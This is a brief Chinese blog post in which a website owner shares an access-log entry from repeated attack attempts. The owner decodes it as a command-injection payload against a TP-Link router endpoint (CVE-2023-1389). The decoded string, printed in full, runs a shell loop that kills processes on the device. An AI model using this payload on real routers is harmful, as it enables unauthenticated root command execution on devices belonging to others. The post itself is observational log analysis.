來自巴拿馬的傢伙這個月已經嘗試攻擊我網站幾十次:
截下其中一段 log
141.98.83.197 - - [07/Jul/2024:13:17:42 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 403 235 "-" "Go-http-client/1.1"
經轉碼得到
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`for proc_dir in /proc/[0-9]*; do pid=${proc_dir##*/}; buffer=$(cat "/proc/$pid/maps"); if [ "${#buffer}" -gt 1 ]; then if [ "${buffer#*"/lib/"}" = "$buffer" ] && [ "${buffer#*"telnetdbot"}" = "$buffer" ]; then kill -9 "$pid"; fi; fi; done`)
問了估狗大神後得知是一個 TP-Link路由器在 Web管理介面上的命令注入漏洞(CVE-2023-1389), 允許未經身份驗證的攻擊者透過簡單的字串請求注入命令, 這些命令將以 root身份運行, 從它的文字內容看起來是進入到程式執行序或記憶體暫存中去執行或修改某些東西(執行telnet??)
沒有留言:
張貼留言